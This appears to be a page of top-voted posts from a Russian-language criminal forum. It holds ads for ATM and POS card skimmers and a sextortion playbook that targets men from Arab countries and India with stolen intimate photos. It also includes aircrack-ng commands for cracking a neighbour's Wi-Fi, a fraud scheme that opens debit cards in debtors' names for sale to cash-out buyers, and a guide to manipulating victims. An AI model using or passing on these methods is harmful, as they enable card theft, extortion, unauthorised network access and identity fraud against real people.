Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 16.12.2021 во всех областях

  1. 8 баллов

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    ДОСТУПНА НОВАЯ ВЕРСИЯ – НОВЫЙ ИНТЕРФЕЙС, ПОВЫШЕННАЯ АНТЕННА, МОДЕЛЬ V22.3.4 LTE2017-модель 2018 года. Скимминг банкоматов без какого-либо физического контакта. Этот скиммер будет работать без физического подключения к банкомату/POS-машине. Этот продукт является нашим бестселлером и является самым популярным устройством для скимминга кредитных карт во всем мире. Это GSM-перехватчик – скиммер. Он получает данные кредитных карт из банкоматов и POS-терминалов. Небольшой размер 5×4 сантиметра, длина антенны 17 сантиметров. С одной зарядкой он может работать до 8 часов, а изготовленная память может захватывать около 100000 данных кредитных карт, с антенной он может принимать данные в радиусе 50 метров. Устройство может работать от (-25 до +45 градусов). Мы используем батареи 3,7 В 2500 мАч. При одной зарядке устройство может работать до 8-10 часов. Он имеет встроенную память 32 Гб, он может хранить до 100000 данных кредитной карты с pin-кодами. Кратко – Приемник данных GSM-это приемник GSM-модуля, который с помощью специального программного обеспечения клонирует и получает всю информацию о кредитных картах из банкоматов и POS-терминалов. Полученная информация хранится на вашем телефоне или ноутбуке. Чтобы собрать эту информацию, вам просто нужно подключить устройство к компьютеру или мобильному устройству, и устройство отправит данные на ваш компьютер, с помощью программного обеспечения V22.3.4. GSM-приемник также реализовал новую функцию, возможность добавления банка питания для увеличения срока службы скимминга. GSM – приемник данных небольшой, и вы можете легко спрятать его в сумке, одежде, кармане или в автомобиле-рядом с терминалом POS/ATM. Устройство имеет два светодиода – красный и зеленый Красный – Устройство должно заряжаться. Мигающий красный – Устройство может работать еще 30-40 минут, после чего его необходимо зарядить или добавить блок питания или зарядное устройство usb. Зеленый+Красный – Устройство работает. Мигает зеленым – устройство подключается. Цена за GSM перехватчика $1200 USD с доставкой включена. Цена GSM перехватчика + энкодер MSR и 100 пустых пустых карт $1415USD с доставкой включена.

    1,200.00 USD

  2. 5 баллов

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Ncr, Wincor Nixdor, Diebold Insert Skimmer.Полный комплект готов к работе. Батарея может работать до 48 часов,наружная температура не влияет на время работы скиммера, так как скиммер находится внутри банкомата.Храните до 15000 дорожек кредитных карт. Полный комплект включает в себя инструменты для вставки и удаления, кабель для передачи данных,компакт-диск с программным обеспечением, это продукт plug and play, который готов к работе. Доступен для заказа PIN-пад в качестве дополнительной опции.

    1,000.00 USD

  3. 3 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    СКИММЕР-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ПЕРЕХВАТЫВАЕТ СООБЩЕНИЯ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ЗАПИШЕТ ИНФОРМАЦИЮ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. СКИММЕР EMV-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS ДЛЯ ПЕРЕХВАТА СВЯЗИ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS И ЗАПИСИ ИНФОРМАЦИИ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. Скиммер Emv-это устройство, которое помещается внутри банкомата или POS для перехвата сообщений и записи кредитной карты между чиповой картой и считывателем чипов из банкомата или POS, таким образом, вся информация о кредитной карте похищается. У вас будет быстрый и простой трек 1, трек 2 и PIN-код со всех кредитных карт, которые используют эти банкоматы или POS. Вы можете загрузить информацию с скиммера Emv, подключив телефон или ноутбук по Bluetooth к скиммеру Emv. Такое устройство СКИММЕРА EMV может не только считывать данные владельца карты с чипа, но и перехватывать PIN-код. УСТРОЙСТВО СКИММЕРА EMV создает копию исходной карты, включая все стандартные проверки подлинности SDA-Статическая проверка подлинности данных, DDA - Динамическая проверка подлинности данных, CDA-Комбинированная проверка подлинности данных. С помощью нашего устройства EMV Скиммер вы можете очень легко получить всю информацию о кредитной карте из любого банкомата или POS. С помощью устройства СКИММЕРА EMV вы можете получить трек 1 + 2 + Pin.

    1,600.00 USD

  4. 3 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Изготовим скиммеры под любой банкомат и любые цели. Возможно решение с передачей данных по GSM, bluetooth, internet. Обращайтесь всегда проконсультируем

    1,500.00 USD

  5. 1 балл
    Спасибо большое , был рад сотрудничеству
  6. 1 балл
  7. 1 балл
  8. 1 балл
    Привет. Схема скорее подойдет небрезгливым людям,кому нужно в короткие сроки срубить баблеца. Ибо через неделю меня уже она заебала Знание английского: переводчик+элементарные слова Суть: Все знают тему о разводе дрочеров с последующим их шантажом. Так вот, тема почти такая же,но работать мы будем с буржуями с сайта misstravel.com . Именно там находится тот контингент, который : 1) Более чем платежеспособный 2) Не настолько напуганы,как русские дрочеры 3) Жители Арабских стран и Индии,где публичного позора боятся раз в 10 больше,чем у нас. 1. Подготовка к работе. Нам нужны фотографии обычной 18-25 летней девушки , желательно не уродки. И чтоб были ее интим фотки. У меня таковые находились со взломанных страничек вк. Далее левая почта и ватсапп. Думаю с этим проблем не возникнет . Аккаунт на misstravel.com . Пока заполните все данные, загрузите и фотграфии и дождетесь подтверждения аккаунта пройдут где-то сутки. messeneger (штука для переписок фейсбук) MoChat, чтобы поставить 2 ватсаппа на тлф. Ну или NOX ,если через пк/ноут 2. Поиск жертв. Нажимаем на поиск , фильтр и ставим то,что нам нужно. Я работал с такими параметрами. Вы можете подправить или что-то внести,если считаете нужным. Но скажу Европейцам вообще похуй че вы там сливать собираетесь . Так же можно искать по локации типа ОАЭ, Кувейт, Индия , Саудовская Аравия и тд. После того как поставили параметры гуляем по поиску и тыкаем на странички . Вскоре они увидят ,что вы заходили и сами начнут писать. 3. Отбор жертв. Вообще я не совету переписываться больше чем с 3 махмудами. Ибо это заебно и убивает много времени. Если с СИ всё в поряде,то сразу поймете кого можно переводить на следующий этап,а кого слать нахуй. 4. Прогрев и сбор информации. После того ,как выяснили кто нам подходит. Зовём их "пообщаться поближе " в ватсап. Часто они даже первые предлагают. Обмениваетесь номерами и вуаля. Сразу чекаем его профиль в Фейсбук. Делатеся это просто :вбиваем номер в мессенеджер (немножко пробива). Люблю фейсбук за то,что люди там пишут информацию о себе ,начиная от школы в который учились,заканчивая местом работы и семьей) Это нам на руку. Ищем близких друзей, родственников,место работы. В общем пробиваем по полному. Параллельно общаясь и аккуратно,вызывая доверия и напрочь убирая сомнения ,что вы фейк сводим разговор в интим русло. Далее идет обмен фотками и тд (да,да ради денег придется немного позырить на х*и). В приоритете ,чтобы была фотка с лицом,но если махмут не скинет их,ничего страшного,пойдут и без лица. Сохраняем чат ватсапп отправив себе по почте и здесь начинается шантаж. 5. Шантаж Пишем ему "красивое "письмо на английском,что какой он плохой , выкладываете всю инфу о нем(его профиль фб ,место работы и тд) и говорите,что мол друган либо плати,либо все увидят твоё сокровище и этот диалог. Если грамотно всё сделать,компромата будет достаточно и инфы по махмуду тоже,то это 100% профит. 6. Сколько $$$ просить? Ну зависит от того, что вы нарыли:) Ну и от платежеспособности нашего персонажа. Но не менее 100$. На данном этапе есть одна загвоздка,так как махмут может быть тупым и не уметь переводить через битки и тд. Вообще они там пейпалы всякие любят,мне как то похуй и я пару раз на свой реальный пейпал принимал и вроде норм. Ну в принципе всё. Из минусов схемки это сложность приема бабла и засоряются контакты телефона, уходит дохуя времени, ну и на х*и смотреть надо.
  9. 1 балл
    Мы воспользуемся инструментом Aircrack-ng. Я буду это делать через Kali Linux, где он предустановлен. Открываем терминал и переводим нашу вай-фай карточку в режим мониторинга вот такой командой: sudo airmon-ng start wlan0mon После этого (изменения режима с приема на мониторинг) мы сможем видеть весь проходящий вокруг нас трафик, для этого вводим команду airodump-ng: sudo airodump-ng wlan0mon Мы видим такую картину. Точки доступа здесь сверху, а пользователи снизу: Дальше займемся непосредственно перехватом хендшейка) Выбираем нужную нам точку доступа и запускаем airodump-ng непосредственно на неё следующей командой: sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -write /root/Desktop/hack wlan0mon Настройки: -c Канал беспроводной сети --bssid MAC адрес точки доступа --write Файл в который будет записано рукопожатие wlan0mon Сетевой интерфейс Теперь ускорим процесс перехвата хендшейка путем того, что отключим пользователя от точки, чтобы он еще раз прошел авторизацию. Можно этот шаг пропустить, если вы не хотите этого делать (палевно чутка, но зато быстро). Деаутентифицируем всех пользователей точки: sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon --deauth 5 Сколько deauth сообщений отправить (0 — без ограничений) -a MAC адрес точки доступа Wlan0mon Сетевой интерфейс После этого клиент еще раз подключится к сети и мы перехватим хендшейк. Дальше необходимо расшифровать пароль из перехваченного рукопожатия методом перебора по словарю. Словари можно найти в интернете) http://wordbook.xyz/download/ вот хороший сайт с разными словарями. Выполняем такую команду: aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 hack.cap Настройки: -w Путь к словарю с паролями -b MAC адрес точки доступа hack.cap файл с нашим перехваченным рукопожатием И ждем) В случае успеха нас ждет подобное сообщение: Простых вам соседских паролей, друзья))
  10. 1 балл
    Короче, бандюги! Сегодня хочу поделиться с вами наикрутейшей схемой, связанной с кредитами и задолженностями. Тема, сразу говорю, трудная, но, поверьте, она того стоит! Итак, сразу к сути: Искать будем людей, у кого проблемы с приставами, а именно имеются непогашенные задолженности перед приставами (ФССП - Федеральная Служба Судебных Приставов) за кредит, ипотечные просрочки, штрафы ГАИ. То есть, если реклама будет в сети, то пишем следующим образом: помощь в погашении кредитов/ипотеки. Погашение задолженностей в ФССП. Нам будут писать или звонить люди с разными проблемами, и, чтобы понять, подходит ли этот клиент нам, мы узнаем, с какой именно проблемой он к нам пришел. При проблеме с кредитом: Кредит был взят в банке или микрозаймах? Открыто ли производственное дело в базе ФССП? Если этот человек брал кредит в банке, и у него есть просрочки, то, конечно, у него есть производственные дела в ФССП. Это мы можем посмотреть сами, узнав у человека ФИО, город и дату рождения. Мы видим, что у него есть задолженности, он нам подходит, НО. Нам нужно знать, открыты ли у него дебетовые счета в банках, если да, то в каких. Если у него много где есть счета, он нам не подойдет. Нам нужны люди, у которых нет открытых дебетовых счетов в топовых банках: сбербанк, альфа банк, райфайзен, россхельхох и т.п –все то, что скупается барыгами. Как правило, у таких людей, у кого задолженности, есть кредитные счета, карты, но не дебетовые. Хранить им нечего на дебетовых счетах. Значит человек нам подходит и работаем по нему дальше. При проблеме с ипотечными просрочками: сколько просрочек? Производственные дела завели? Если у человека просрочки по ипотеке, то скорее всего, он должник перед ФССП. И он также нам подойдет. Спросим про созданные дебетовые счета и в путь. При штрафах в ГАИ – все аналогично. При неоплате создаются производственные дела в ФССП, и он автоматически наш клиент. Если без воды – НАМ нужны люди, у которых есть неоплаченные штрафы в ФССП, откуда они там нам без разницы. Мы поговорили по телефону с людьми, договариваемся о встрече. Договариваемся в любом кафе. Приходим хорошо одеты. В рубашке, брюках, с папочкой, можно без. Тетрадка, ручка. Мы объясняем, что мы поможем списать долг в приставах за 35% от долга. Мы не берем предоплат, и берем деньги только после результата. Часто спрашивают, а как мы будем это делать. Тут, разумеется, как и в любой фирме, которая помогает сделать военный билет или избежать наказания за пьяное вождение, есть свой изюм, но чтобы было понимание, объясним: “Действуем в рамках законодательства, выписываем векселя от своих юр.фирм и погашаем ваши долги векселями, после чего банкротим свои фирмы и по закону имеем полное право не погашать свои долги, ввиду того, что мы банкроты. Это вам знать, конечно, необязательно, процесс сложный и нудный, но мы съели на этом собаку, кошку и еще пол зоопарка, поэтому поможем вам с вашей проблемой за 3-4 недели”. Человек пришел к нам не от хорошей жизни, он будет согласен на все, лишь бы у него не забрали квартиру или сняли с ареста недвижимость и машину.. Разные ситуации… Мы объясняем, что нам необходимо иметь доверенность на представление интересов данного человека в банке и в ФССП. В банке – для того, чтобы открыть дебетовый счет и уведомить потом ФССП о наличии той или иной суммы денег на счету, с которого необходимо будет списать средства в счет приставов. Идете в нотариус, клиент оплачивает “доверку”. Ты становишься представитель (юрист) этого человека и можешь сразу идти в банк и оформлять в каждом банке по 2 дебетовой карты. Необходимы карты следующих банков: Промсвязь банк Альфа банк Банк Русский стандарт БинБанк Сбербанк Юникредит банк Хоумкредит банк И другие, в зависимости от нужд барыг, которые работают с дроповодами и скупают карты. Обычно скупаются карты с холдом 3 дня. Искать барыг несложно, их полно на разных теневых форумах, не трогать форумы топовые, дабы не ставить палки в колеса Уважаемым людям. Там в бешеных объемах продается пластик под разные нужды. Оформляем в каждом банке по 2 дебетовых счета. Объясняем, что у человека проблема и счета создаются с целью благотворительности. Показали доверенность. Создали счета, получилось ~14 комплектов карт.(можете создать меньше, можете больше). Продаем оптом по 3-5 тысяч рублей. Пусть по 4 тысячи. Выйдет это в среднем 56 тысяч рублей. Разумеется, предварительно мы записали номера карт(самые ходовые это альфабанк, сбербанк, хоум, промсвязь и т.п.). Продали. Получили прибыль. Ждем две недели… Прошло 2 недели после продажи (можно через неделю). Мы идем в ФССП и представляемся представителем нашего клиента. Открываем дверь с пинка и даем им список карт, которые необходимо взять на контроль для списания денег, которые туда зайдут. Всё. Карты продали, деньги выручили. Эти карты купят обнальщики у барыг, которым мы продали карты. Обнальщики начнут лить деньги примерно через 1-2 недели (с тем условием, что их еще должны купить). Благо с картами проблем нет, покупают их очень оперативно, и, как правило, даже дефицит с ними. Как теплые пирожки с картошкой во времена советского союза (или чё там в СССР быстро расходилось?). Нальщики обнальщики льют на карты деньги, иногда миллионами, и необходимая часть денег, которую мы должны ФССП остается на картах, и наш клиент в итоге остается доволен. Производственное дело закрыли и клиент обязан отдать нам 35% от списанной суммы. Если это 200 000 рублей, то мы получаем 70 000 рублей. % можно сделать меньше, если клиент будет говниться. Такое бывает, и даже 5% в таких суммах играют большую роль. По факту мы имеем с клиента дважды. Если ты лентяй, можно поиметь раз, но тогда не будет сломанного телефона. А будет он, если клиенту помочь и нам это необходимо при завлечении… С какими проблемами сталкивались? У меня есть человек из другого города. Он обработал уже под сотню клиентов, и возникали такие случаи, когда менты вызывали его клиентку и просили разъяснить, откуда взялись деньги на картах, которые созданы на ее имя. Клиентка объяснила, что ничего не делала и только лишь выписывала доверку на человека, который пообещал помочь. Вызвали человека, моего человека, и задали вопрос, почему на картах клиента, которые мы создали, оказались средства, добытые мошенническим путем? Не в курсе, откуда. “Товарищ следователь, откуда мне знать, я занимаюсь в интернете посредничеством, продаю светотехнику, экономит электричество, годами не перегорает, вообще новинка, суперская тема. Нашли меня люди, сразу несколько человек мне писали, предложили бартер, я им продукцию, они мне с долгами ФССП помочь пообещали. Я, как законопослушный и обязательный человек, конечно, не имею долгов, но подумал, что могу помочь людям. Не верилось сначала, думал, что не бывает чуда, и не согласился первый отправлять светотехнику. Они предложили высылать им карты, которые будут пополняться местными меценатами, будет оказываться помощь, и после оказанного результата, я должен был высылать лампочки. Результат был, я оформлял заказы на нужное количество лампочек и писал при заказе тот адрес, который мне указывали эти люди. Общение проходило в телеграме, они постоянно добавлялись с новых аккаунтов, а старые я просто удалял... Не задавался вопросами, зачем это все надо, видимо, им так удобнее... Сам к картам не имею доступа, вы, наверное, можете видеть, что в нашем городе средства никак не обналичивались ни мной, ни моей клиенткой.” Смысл такой. И было это, потому что карты были проданы горе барыге, который продавал их под черные нужды, не исключено, что под теракт. Дело никакое не заведут, но голову поебут. Так вот самое главное!!! При продаже карт, чтобы избежать головной боли, необходимо указывать под белое или серое. Обнальщики перегоняют суммы с карты на карту, или те же даже наркобарыги с киви выводят на 5 карт еще, и такие карты не вызывают у ментов никаких мыслей, чтобы хозяина карты нагрузить, так как все уже в курсе о дропах и дроповодах. Поймать реально только при обнале с этих карт. В общем! Продаем карты с пометкой под белое, серое. И говорим, что дропам проблемы не нужны. Возможные вопросы: Как ты начинал искать клиентов? Я списал долг своей тетке, которая работает на заводе. После нее ко мне начали обращаться женщины и охранник с этого же завода. Человека 4 я обслужил только с завода, те уже рассказывали обо мне своим родственникам, те своим, те друзьям….коллегам….подругам…друзьям…короче понятно, думаю. Рекламу даже не давал негде. Создавал паблик в вк, но его быстро заблокировали по жалобам всяких служителей ФССП, наверное... Как удостовериться в том, что человек не кинет меня после выполненной услуги? Расписка. Если не знаешь, как пишется, я расскажу. Обычно это указываются обе стороны, паспортные данные и условия. Всё элементарно. Это нужно будет на первых порах, так как после 2-4 человек ты можешь диктовать свои условия и брать предоплату в 100% сразу, объяснив, что репутация уже прекрасная, а геморрой тебе лишний не нужен. Как будем продавать барыгам, ведь на них напишут арбитраж, и его забанят, и он больше не купит у тебя? Барыги пластика не несут ответственности за сохранность денежных средств, только за лок карт! Надо ли говорить дропу про карты? Можно сказать, что необходимо создать карты дебетовки для принятия средств с векселей, чтобы те шли в счет погашения приставов... такая мурня напрочь отбивает у клиента спрашивать дальше глупые вопросы. Нужна ли видимость, как в твоем случае про лампочки? Нужно подготовить почву на случай злых дяденек из полиции? Да, это легко делается, любая левая история, придумывайте, если есть фантазия. Можно ли поставить все на поток? Конечно. Можно по Авито даже нанять людей, которые будут работать по сделке. Обучаем их, что говорить клиентам, те ищут людей и приводят к нам, мы обрабатываем и платим копеечку за реферала. Вот, в принципе, и всё. Всем удачи ?
  11. 1 балл
    Белой трубкой при наличии анонимной пользоваться вообще нет смысла , хотя , есть в этом смысл навреное типо семье позвонить и т.п
  12. 1 балл
    очень понравилось с тобой работать , после завтра еще будем, как и обещал!)
  13. 1 балл
  14. 1 балл
    Спасибо бро , ты классный , давай еще поработаем
  15. 1 балл
    Как правило, именно на этом прогорают начинающие мошенники.
  16. 1 балл
    Думаю все понимают что СИ - это взлом человека, такие мелочи расписывать не буду Изначально напишу то, как нужно вести себя, основы: Номер один – уверенность в себе. Если вы не будете уверенны в себе, можете даже не лезть сюда, это сразу заметно, просто вспомните свои или чьи-либо выступления, когда люди выглядят неуверенно, даже не хочется их слушать. Это как фундамент всего Номер два - самовнушение. Самовнушение, это мой конёк, я за считаные секунды начинаю сам себе верить, в любую чушь, но это так же убивает меня, моя реакция почти всегда наиграна, об это чуть позже. Если вы верите сами себе, это уже сильно, но на этом не всё, посмотрите с другой стороны, глазами другого человека, если не всё так гладко, то вам стоит перебрать варианты как подойти лучше. Если вы не поверили сами себе, подумайте почему, измените что-то в рассказе. Номер три – запоминай всё. Я всегда помню что и где я даже преувеличил в своём рассказе, помню всё о чём я врал, до мелочей, гайдики как распознать лжеца, в стиле рассказать всё задом наперёд просто отпадают. Если вы помните всю свою ложь, шанс что вас накроют минимален, все мои знакомые думают что я никогда не лгал им по серьёзному, и так же это опыт, вы запомните всё о чём когда-либо лгали, вы построите собственные шаблоны, вам будет легче придумывать километровые истории что бы очередной школьник отдал вам свой шмот в стиме. Так же человеку очень льстит что вы запомните всякие мелочи о нём, у меня с этим так же нет проблем, я всегда слушаю людей, запоминаю их предпочтения и т.д., это открывает новые пути подхода, так же замечайте что-либо в их внешности, помогает подлизать лишний раз. Номер четыре – примеряй маски Найди для себя основные стили поведения, подставляй их там где это нужно, уверенный в себе, просто ссыкунишка который сам ничего не может, человек который никуда не лезет, наоборот тот который заёбывает всё и вся, эксперементируй, получай опыт, свои личные шаблоны поведения никогда не помешают Номер пять – замечайте мелочи Напоминает пункт третий, но это чутка не то, тут вы должны анализировать поведение, повадки людей, даже окружение, дом, его друзей и т.д., находить слабые места, находить то за что можно уцепиться, например хобби, найти общею тему для разговора Номер шесть – прикупите доверие человека При первой встрече, стоит как-то вызвать его доверие, стрельнуть сигу, купить кофе, что-либо ещё, сразу с размаху найти общею тему для разговора и цепанитесь за мелочи, анализируйте Номер семь – умейте поддержать разговор Всегда умейте поддержать разговор, как пример, задавать незначимые вопросы если это первая встреча, узнавайте мелочи про человека, кем работает/учится, его хобби, от этого отталкивайтесь, задавайте вопрос с продолжением, что бы с ответа можно было разговор толкнуть дальше, если разговор ведёте только вы, дайте собеседнику говорить тоже, создайте неуют, начните молчать и смотреть прямо на собеседника, как и было описано выше, анализируйте, ищите нитки что бы цепануть. Номер восемь – научитесь продавать себя Продавать себя, стройте из себя лучший выбор в жизни человека, стройте из себя просто идеал Что-то в стиле “5 шагов”, как работают продавцы в магазинах, впарить абсолютно ненужный товар Презентовать его, хорошенько отрекламировать как идеал, сделать “акцию”, сравнить с другими, и доказать почему именно это вам нужно. Ну или копипаста с гугла: Установление контакта Выявление потребностей Презентация товара Преодоление возражений Завершение сделки Я могу это писать вечно, есть много тонкостей, я расписал основные, что вытащил с себя сразу, подумайте сами, это никогда не помешает Я рассказал основное про ваше поведение и настрой себя на ложь, стартовая настройка скажем так. Всё это поможет вам построить личные шаблоны, при помощи наработанных шаблонов, сразу всё станет легче. Дальше пойдут примеры как можно сыграть на чувствах: Всё что тут расписано это достаточно просто, это не работает так легко, в основном такие дела продлеваются на недели, месяца, так легко ничего не бывает, нужно впахивать Срочность Либо сейчас, либо найду другого, работает очень часто, т.к. не даёт времени на размышление, начинаются нервы, и очень часто происходит ошибочный выбор Внушение важности Нужно что-то преподать человеку, что бы он и не понял что ему это впихнули, а потом это забрать, ему эта вещь была не нужна, но теперь без неё он не представляет жизни. Вещи, тут как метафора, в основном используют как нужную вещь людей, их способности, что бы завысить ценик, зарплату и т.д., много исходов. Доказать человеку что он важное звено, и разрушить эту иллюзию Ну, тут всё просто, притягиваем человека, повышая его ЧСВ и самооценку, потом шлём нахуй, если вы девушка, очень легко получать что-либо от ссыкливых и замкнутых парнишек, если вы парень, проделать это с кем угодно, дайте жертве уцепиться за что-то в вас, и он ваш. Случай и удача Заставьте почувствовать человека, что вы или что-либо лучшее что было с ним, такое только раз в жизни, этого больше не будет, дайте ему понять что это нужно держать и не отпускать никогда
  17. 1 балл
    ЖИ есть ЖИ, годно написана
  18. 1 балл
    Мэннинг, Сноуден, Ассанж, Миранда, The Guardian… С каждым днём мы получаем всё больше и больше подтверждений истине, в которую не хочется верить: идёт война Не объявленная, тихая, но всё же самая настоящая война.
  19. 1 балл
    Наркотики зло, какая кока , вали отсюда со своими советами !
  20. 1 балл
    Коммуникация интересует всех. Она не только позволяет собирать информацию, но и предоставляет возможности влиять на человека. Но базовой частью этого процесса остается влияние на ум человека, именно поэтому многие исследовательские проекты сейчас переориентированы на новую точку — принятие решений. Еще первые исследования в области информационных войн, из которых все и начиналось, четко показывали: слабым местом на поле боя является разум солдата. И это понятно хотя бы потому, что все остальное можно защитить, и только ум остается открытым для влияний. В 2007 Вайнбергер (ее собственный сайт — sharonweinberger.com) опубликовала статью об известном феномене, по поводу которого уже даже шутят, мол, люди жалуются, что их облучают спецслужбы. Но теперь оказалось, что в их словах есть правда. Еще в 1965 г. Пентагон начал проект «Пандора», в котором исследовались поведенческие и биологические последствия малых доз микроволн. А еще через несколько лет этот проект был закрыт. На страницу Вайнбергер среагировало 581 человек, многие из которых свидетельствовали о именно о такой своей судьбе. А из акта о свободе информации удалось получить некоторое подтверждение. Как оказалось, исследовательская лаборатория ВВС запатентовала изобретение, позволяювшее передавать в мозг звуки и голоса как вариант инструментария психологической войны. То есть и теоретически, и практически это оказалось возможным. Вайнбергер (одна из ее книг называется «Мнимое оружие», и в ней, в частности, речь идет о изомерных бомбах, которые сегодня разрабатывают США, Россия, Китай) пишет на темы национальной безопасности не только как журналист, но и как исследователь (см. ее био). Она имеет степень бакалавра Университета Джона Хопкинса и магистра российских и восточноевропейских исследований из Йеля. У нее есть и отдельный исследовательский проект War 2.0 с финансированием от корпорации Карнеги, где исследуется взаимодействие и взаимосвязь социальных медиа и национальной безопасности. У нее также много публикаций на сайте BBC в разделе «Будущее», в которых говорится о новых разработках в сфере войны, например, о роботах с автономным мозгом. Военные лидеры боятся такой автономности, чтобы не получить неконтролируемые действия, но реально все равно на каком-то уровне там есть контроль человека. Таким работам предлагается отдать, например, зачистку акватории от мин. Великобритания, кстати, отказывается от использования дельфинов в этих случаях, поскольку рассматривает работу с дельфинами как слишком дорогую. Украина, как пишет пресса, также имеет своих боевых дельфинов. В одной из работ Вайнбергер приводит ряд «аксиом», одна из которыхзвучит так: следует инвестировать сегодня в науку и технологии, потому что завтра все равно за это придется платить. В Лондоне существует Институт поведенческой динамики (сайт — www.bdinstitute.org), который на базе своих разработок ввода групповых поведенческих изменений «породил» Лаборатории социальной коммуникации (сайт — www.scl.cc), которые подают себя как пионеров в области операций влияния. Так пишет о них та же Вайнбергер. Кстати, этим Институтом руководил, пока был жив, известный специалист по информационным войнам профессор Лидского университета П. Тейлор. Правда, другие источники называют основной движущей силой создания Института и Лабораторий Н. Оукса. Оукс, который возглавляет работу Лабораторий, приводит список типичных ошибок при создании операций влияния: попытки менять отношение, а не поведение, фокусироваться на индивидах, а не на группах, использовать телевизионные месседжи вместо опоры на имеющиеся мотивации, использование исследовательских методов для анализа аудитории вместо диагностики группы. Институт и Лаборатории активно работают над прикладными задачами, а также над обучением военных в сфере информационных операций. То же касается и книги, вышедшей под эгидой института — «Поведенческий конфликт». Один из сотрудников Института, Л. Роуленд, напечатал статью, из которой можно понять направления работы в этой сфере. Поведенческая динамика как отрасль своей базой считает ТАА (Target Audience Analysis) — АЦА (Анализ целевой аудитории), акцентируя внимание на том, что это не только знание ее культуры. С другой стороны, следует изучать не все подряд, а лишь выборочно, что нужно, поэтому там и использовано слово «диагностика». Следующий принцип — смотреть с точки зрения аудитории. Роуленд подчеркивает, что дети не перестанут бросать камни в солдат в Ираке, сколько бы цветных буклетов с призывом не делать этого было роздано. Надо не просто фокусироваться на аудитории, а быть аудиториецентричним. Как пример можно привести предотвращения забастовки в автомобильной индустрии, что было сделано лабораториями. АЦА продемонстрировал, что есть только один драйвер, который действует сильнее, чем увеличение заработной платы. Это потеря работы из-за конкуренции с дешевой рабочей силой в еврозоне. Соответственно, Лаборатории запустили рекламную кампанию, которая не только предотвратила забастовку, но и позволила еще сократить заработную плату на 25%. Аналогично было проведена кампания по спасению страхового общества «Ллойда». Оно понесло большие потери, и на этом фоне надо было вернуть доверие вкладчиков и деньги. И это удалось сделать на таком негативном фоне. Британские военные тоже отмечают относительно АЦА — понимание аудитории является началом и концом любой операции влияния, а операции влияния оказались в центре внимания в последние два-три года. Можно понять, почему. Как нам кажется, здесь действуют следующие факторы: Переход к длительной войне, Выход на первое место работы с населением, Партизанская война тоже требует опоры на население. Среди принципов Роуленда есть и такой: социальные силы предшествуют месседжам. Когда человек слышит крик «Пожар», он смотрит, что начинают делать другие. Этот месседж должен иметь резонанс, потому что он спасает наши жизни. Но нас в первую очередь интересует то, что делают другие. Как подчеркивает Роуленд: «Наша реальность во многом определяется тем, что мы думаем, что думают другие, а мы думаем, что они так думают. Когда возникает потребность в изменениях, не факты, информация, отношение или резонансные месседжи меняют людей: людей меняют люди». Отсюда вытекает следующий принцип: следует интересоваться мышлением не отдельного индивида, а всей группы. Т.е. возникает соотношение: совершит ли человек какое-то действие, если он будет знать, что другие так сделают. Наш пример: нам кажется, что Оранжевая революция была как раз таким коллективно подсказанным действием. И большую роль в этом сыграло телевидение, которое создавало ощущение общего действия. Под этим углом зрения изучается и пропагандистская кампания «Талибана». Вайнбергер публикует в журнале Nature статью «Социальная наука: сеть войны», где цитируется человек, три года занимавшийся проблемой минирования дорог. Собрав всю имеющуюся информацию, он пришел к парадоксальному выводу: «Информация не является решением нашей проблемы». Вместо этого он занялся компьютерными моделями, которые пытаются прогнозировать поведение групп и то, как это поведение можно изменить. Это называется «человеческой динамикой», или «компьютерной социальной наукой». На нее Пентагон выделил в 2011 г. 28 миллионов долларов финансирования. Одним из аргументов для развития такого моделирования стала ситуация в 2003 г., когда велись поиски Саддама Хуссейна. Когда была создана сеть тех, с кем Саддам имел отношения доверия, оказалось, что там нет разыскиваемых американской армией, изображенных на известных игровых картах. Эта сеть заставила военных сконцентрироваться на фигурах низшего уровня. В результате информация о местонахождении была получена от одного ключевого охранника. (См. также более подробный анализэтой ситуации использование социальных сетей на сайте War 2.0. Там также рассмотрены и другие варианты использования социальных сетей для целей национальной безопасности.) П. Глур из Массачусетского технологического института (см. его персональную страницу) прогнозирует события на основе анализа социальных сетей (см. здесь и здесь). Например, он спрогнозировал, что швейцарцы не поддержат строительство минаретов, хотя социологи говорили обратное. И Глура оказался прав в отношении результатов референдума. Затем ошибку социологов объяснили тем, что швейцарцы, отвечая, не хотели выглядеть расистами. Глур говорит, что «Твиттер» очень хорошо предсказывает поведение, на которое влияет общая публика. Это может быть новый фильм, на который мы идем или не идем, учитывая, что именно говорит публика: хороший он, или плохой. Каждый из нас может вспомнить, как перед выборами люди начинают спрашивать друг друга: «За кого вы собираетесь голосовать?». Толпа играет роль в случае кино, но она не так хороша в случае политических событий. Здесь начинает играть «рой», это группа нейтральных экспертов, которые, например, редактируют «Википедию». Это все использование группового мышления. Сегодня запущены сайты, где каждый может попробовать себя в прогнозировании будущего. И сделано это фирмами, имеющими гранты IARPA — агентства, которое занимается распределением финансов под исследовательские проекты разведки. У американцев есть интерес к работам И. Смирнова, институтом которого теперь руководит его жена. Он сейчас называется НИИ психотехнологий им. И. Смирнова. Здесь был разработан аппаратно-программный комплекс MindReader. Сейчас Институт 